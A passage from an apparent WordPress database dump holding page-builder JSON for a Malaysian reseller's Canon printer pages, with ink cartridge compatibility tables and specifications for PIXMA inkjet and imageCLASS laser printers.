(Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-770 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-770XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS5170<\\/p><\\/td><td width=\\\"208\\\"><p>CL-741 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-741XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740\\/CL-741 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740XL (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"736141f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9e8521a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS8270<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-781 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Photo Blue)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Photo Blue)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS9170<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-781 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Photo Blue)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Photo Blue)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS9570<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-781 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780XL (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(7059,3322,'_wp_page_template','template-fullwidth.php'),(7060,3322,'_elementor_edit_mode','builder'),(7061,3322,'_elementor_template_type','post'),(7062,3322,'_elementor_data','[{\"id\":\"9ac79cf\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"2a109eb\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9d59285\",\"elType\":\"widget\",\"settings\":{\"title\":\"Injet Printers :-\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca9ead8\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"9a9d292\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"align\":\"center\"},\"elements\":[{\"id\":\"6ad8678\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA E560 \\/ E560R\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e70128a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/e2f221acba7b4ca795be93654fafca7b_PIXMAE560_2.png\",\"id\":2345}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"509ac9b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Advanced Wireless All-In-One with Auto Duplex\\u00a0Printing for Low-Cost Printing<\\/p><p>The Ink Efficient E560 \\/ E560R is designed to give you an affordable wireless printing experience at low running cost of up to 800 pages.<\\/p><p>Available in Black and Red.<\\/p><p>Print, Scan, Copy<\\/p><p>ISO Standard print speed (A4): up to 9.9ipm black \\/ 5.7ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi<\\/p><p>Recommended print volume: 80 - 400 pages<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"1ba38c4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"9b84d1c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"11\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"37\",\"right\":\"37\",\"bottom\":\"37\",\"left\":\"37\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"19ec1cd\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"d3a1ece\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA E4270\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"47167d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/d6c6807e1827411dade7426d7b93df91_E42XX_AS_FR_op3_blk_en-v1.png\",\"id\":2346}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"c56690e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Compact Wireless All-In-One with Fax and automatic 2-sided printing for Low-Cost Printing<\\/p><p>This compact Office All-In-One features a 20-sheet Auto Document Feeder for productivity and delivers up to 400 pages yield with high-capacity ink cartridges.<\\/p><p>Print, Scan, Copy, Fax<\\/p><p>ISO standard print speed (A4): 8.8ipm black \\/ 4.4ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, Mopria, AirPrint, Wireless Direct<\\/p><p>Recommended print volume: 50 - 200 pages<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"189f9a2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"df0825f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center><span style=\\\"font-size: 0.875rem;\\\">[maxbutton id=\\\"11\\\" ]<\\/span><\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"31\",\"right\":\"31\",\"bottom\":\"31\",\"left\":\"31\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"692b43d\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"a99e262\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA TS9570\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6a04479\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/099574dcdd504b0cbb4abac1a221c06e_TS95XX_AS_FR_cl_blk_en-v3.3.png\",\"id\":2347}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6ab42ff\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>A3 Wireless Photo Printer with Large 4.3\\u201d Touch-Screen and Auto Document Feeder<\\/p><p>This A3 wireless compact Photo All-In-One printer combines amazing compactness and a wide range of printing options for the complete home and small office printing experience.<\\/p><p>Print, Scan, Copy<\\/p><p>ISO standard print speed (A4): up to 15.0ipm black \\/ 10.0ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, wired LAN, memory card slot, wireless\\/wired LAN PictBridge, Mopria, AirPrint, BLE, Wireless Direct<\\/p><p>Recommended print volume: 80 - 300 pages<\\/p><center>[maxbutton id=\\\"11\\\" ]<\\/center>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"657c5e2\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"1c9048c\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA TS8270\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e5da999\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/6d6849f01d6c4e57b1c4a71de1bcd439_TS82XX_AS_SK_op3_blk_en-v1.png\",\"id\":2348}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"8c06b04\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Wireless Photo All-In-One with Large 4.3\\u201d Touch-Screen and Auto Duplex Printing<\\/p><p>This advanced wireless Photo All-In-One is beautifully designed with a wide range of printing options for the complete home printing experience.<\\/p><p>Available in Black, Red and White.<\\/p><p>Print, Scan, Copy<\\/p><p>ISO standard print speed (A4): up to 15.0ipm black \\/ 10.0ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, memory card slot, wireless Pictbridge, Mopria, AirPrint, BLE, Wireless Direct<\\/p><p>Recommended print volume: 30 - 100 pages<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"89b9be8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center><\\/center><center><\\/center><center><\\/center><center><\\/center><center><\\/center><center>[maxbutton id=\\\"11\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"11\",\"right\":\"11\",\"bottom\":\"11\",\"left\":\"11\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e19c5ed\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"48b8328\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"619d0d9\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA G2010\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"b641ed3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/1ae3c86cb64b465c9683e7c860d92b25_PIXMAG2010_1.png\",\"id\":2349}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"cb6e9e3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Refillable Ink Tank All-In-One for High Volume Printing<\\/p><p>Designed for high volume printing at low running cost<\\/p><p>Print, Scan &amp; Copy<\\/p><p>ISO Standard print speed (A4): up to 8.8ipm black \\/ 5.0ipm colour<\\/p><p>Hi-speed USB 2.0<\\/p><p>Recommended print volume: 150 - 1500 pages<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"f95d9d7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"11\\\" ]<\\/center>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ef95652\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"72caeea\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA G4010\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1a96790\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/095399e7118a4e898b6df8c1808358de_g4010_03.png\",\"id\":2351}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"bc59f5a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Refillable Ink Tank All-In-One for High Volume Printing<\\/p><p>Designed for high volume printing at low running cost.<\\/p><p>Print, Scan, Copy and Fax<\\/p><p>ISO Standard print speed (A4): up to 8.8ipm black \\/ 5.0ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, Mopria, AirPrint, Access Point Mode<\\/p><p>Recommended print volume: 150 - 1500 pages<\\/p><center>[maxbutton id=\\\"11\\\" ]<\\/center>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"49effc0\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"79b85a4\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA G1010\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4266d0e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/7e8a12fd533e44278de28d2734874949_PIXMAG1010_4.png\",\"id\":2352}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"79cfa28\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Refillable Ink Tank Printer for High Volume Printing<\\/p><p>Designed for high volume printing at low running cost<\\/p><p>Print<\\/p><p>ISO Standard print speed (A4): up to 8.8ipm (mono) \\/ 5.0ipm (colour)<\\/p><p>Photo Speed (4 x 6\\\"): 60sec. (borderless)<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"23b0d26\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"15\",\"right\":\"15\",\"bottom\":\"15\",\"left\":\"15\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"137f63f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"11\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"28\",\"right\":\"28\",\"bottom\":\"28\",\"left\":\"28\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"35746a1\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"9b7f21a\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA G3010\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"b8c2962\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/abbc0420f899426c86b9f547f8e0476d_g3010_01.png\",\"id\":2721}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"ca1fadd\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Refillable Ink Tank Wireless All-In-One for High Volume Printing<\\/p><p>Designed for high volume printing at low running cost<\\/p><p>Print, Scan &amp; Copy<\\/p><p>ISO Standard print speed (A4): up to 8.8ipm black \\/ 5.0ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, Mopria, Access Point Mode<\\/p><p>Recommended print volume: 150 - 1500 pages<\\/p><center>[maxbutton id=\\\"11\\\" ]<\\/center>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1ffb94f\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"84b94b6\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"130ead1\",\"elType\":\"widget\",\"settings\":{\"title\":\"Laser Printers :-\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"219f45c\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"39c2015\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"ece285e\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS LBP113w\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1273d18\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/74f5403ab44740bc9c8fd1c01ab53d26_LBP113w-1.png\",\"id\":2724}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6b60692\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\"><p class=\\\"sub-title\\\"><strong>Compact with wireless connectivity<\\/strong><\\/p><\\/div><p>Simple to operate and compact in size, the ideal choice for your printing needs.<\\/p><ul class=\\\"list-normal\\\"><li>Print<\\/li><li>Print Speed (A4): Up to 22ppm<\\/li><li>Recommended monthly print volume: 250 - 2,500 pages<\\/li><li>First Print Out Time (A4): Approx. 6.5 sec<\\/li><li>Print resolution: Up to 2,400 (equivalent) \\u00d7 600 dpi<\\/li><li>Mobile Connectivity.<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e0baf05\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"23\",\"right\":\"23\",\"bottom\":\"23\",\"left\":\"23\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"c3f6907\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"11\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"50\",\"bottom\":\"50\",\"left\":\"50\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"f6acb91\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"001a8d3\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF269dw\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1a672fd\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/14e8362b0db44a5daaf2af034760fc58_MF269dw-1.png\",\"id\":2725}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"fb9d4fc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\">\\n<p class=\\\"sub-title\\\"><strong>The Multifunction printing solution with Duplex Auto Document Feeder (DADF)<\\/strong><\\/p>\\n\\n<\\/div>\\nEnjoy greater efficiency. With the duplex auto document feeder, ensure shorter copying and scanning times.\\n<ul class=\\\"list-normal\\\">\\n \\t<li>Print, Scan, Copy, Fax<\\/li>\\n \\t<li>Print Speed (A4): Up to 28ppm<\\/li>\\n \\t<li>Recommended monthly print volume: 250 - 2,500 pages<\\/li>\\n \\t<li>FPOT: Approx. 5.2 sec<\\/li>\\n \\t<li>Max. paper input capacity: 251 sheets<\\/li>\\n \\t<li>Print resolution: 1,200 \\u00d7 1,200 dpi (equivalent)<\\/li>\\n<\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"4f2ce8e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"15\",\"right\":\"15\",\"bottom\":\"15\",\"left\":\"15\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"2a9b750\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"11\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"13\",\"right\":\"13\",\"bottom\":\"13\",\"left\":\"13\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1f6f8ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"a880ac9\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF266dn\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"d63382c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/f8389aa599cc42db986e698ac364f9fc_MF266dn-1.png\",\"id\":2726}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"73a1481\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\">\\n<p class=\\\"sub-title\\\"><strong>The Multifunction printing solution with Mobile Printing and Network<\\/strong><\\/p>\\n\\n<\\/div>\\nFeaturing Network printing and SEND technology, MF266dn is the productive choice for your business operations.\\n<ul class=\\\"list-normal\\\">\\n \\t<li>Print, Scan, Copy, Fax<\\/li>\\n \\t<li>Print Speed (A4): Up to 28ppm<\\/li>\\n \\t<li>Recommended monthly print volume: 250 - 2,500 pages<\\/li>\\n \\t<li>FPOT: Approx. 5.2 sec<\\/li>\\n \\t<li>Max. paper input capacity: 251 sheets<\\/li>\\n \\t<li>Print resolution: 1,200 \\u00d7 1,200 dpi (equivalent)<\\/li>\\n<\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"2fabcd2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"15\",\"right\":\"15\",\"bottom\":\"15\",\"left\":\"15\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"0a62d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"11\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"13\",\"right\":\"13\",\"bottom\":\"13\",\"left\":\"13\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0e45d15\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"04de22f\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF913w\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"790e84e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/7583474b04984f42b18e94fe91075ec9_MF913w-1.png\",\"id\":2727}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"880dc7e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\">\\n<p class=\\\"sub-title\\\"><strong>Compact All-in-One with wireless connectivity, bundled with three toner cartridges<\\/strong><\\/p>\\n\\n<\\/div>\\nSimple solution to your print, scan and copy needs. The small footprint fits desktops with limited space perfectly. Bundled with 3 toners, you can print up to 7,500 pages with low cost per print.\\n<ul class=\\\"list-normal\\\">\\n \\t<li>Print, Scan, Copy<\\/li>\\n \\t<li>Print Speed (A4): Up to 22ppm<\\/li>\\n \\t<li>Recommended monthly print volume: 250 - 2,500 pages<\\/li>\\n \\t<li>FPOT: Approx. 6.5 sec<\\/li>\\n \\t<li>Max. paper input capacity: Up to 150 sheets<\\/li>\\n \\t<li>Print resolution: Up to 2,400 (equivalent) \\u00d7 600 dpi<\\/li>\\n<\\/ul>\\n<center>[maxbutton id=\\\"11\\\" ]<\\/center>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bdfedb6\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"55572b6\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"00c113d\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS 